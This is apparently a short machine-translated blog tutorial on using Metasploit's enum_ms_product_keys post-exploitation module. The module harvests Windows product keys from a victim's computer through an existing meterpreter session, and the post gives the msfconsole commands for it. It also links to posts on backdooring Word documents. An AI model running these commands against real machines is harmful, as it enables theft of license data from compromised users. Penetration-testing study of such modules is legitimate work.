
Enum_ms_product_keys module serves to provide information about the code product_keys OS windows on the victim PC (client computers that have been in meterpreter / exploit).
For more details, please see the screen-shot below.
— start msf

— Exploit enum_ms_product_keys
Here I think we've all been done exploits and meterpreter on the victim's computer. If you exploit and meterpreter or are still confused about the exploits and meterpreter, please lyrics:
Exploit Windows Menggunakan Backdoor Ms Word Doc via MSF or Exploit Windows Menggunakan SET Shikata Ga Nai Msf .
-syntax enum_ms_product_keys
use post/windows/gather/enum_ms_product_keys
msf post(enum_ms_product_keys) > set session 1
msf post(enum_ms_product_keys) > exploit

Recent Posts
- How To Upgrade to BackTrack 5 R3
- How To Sniffing with ettercap
- how to exploit windows 7 and windows XP using backtrack 5
- conduct exploitation of the Windows Xp and exploitation windows 7 Creating a backdoor with x86/shikata_ga_na
- DOS attacks .htaccess and Solutions
- Detection Port Scanner with portsentry
- How To Overcome Backtrack Blank Screen when typing startx
- Stages of Forensic Activity
- about IT Forensic
- Solution msfconsole & msfupdate are not running after updating to 4.5.0 metasploit bt0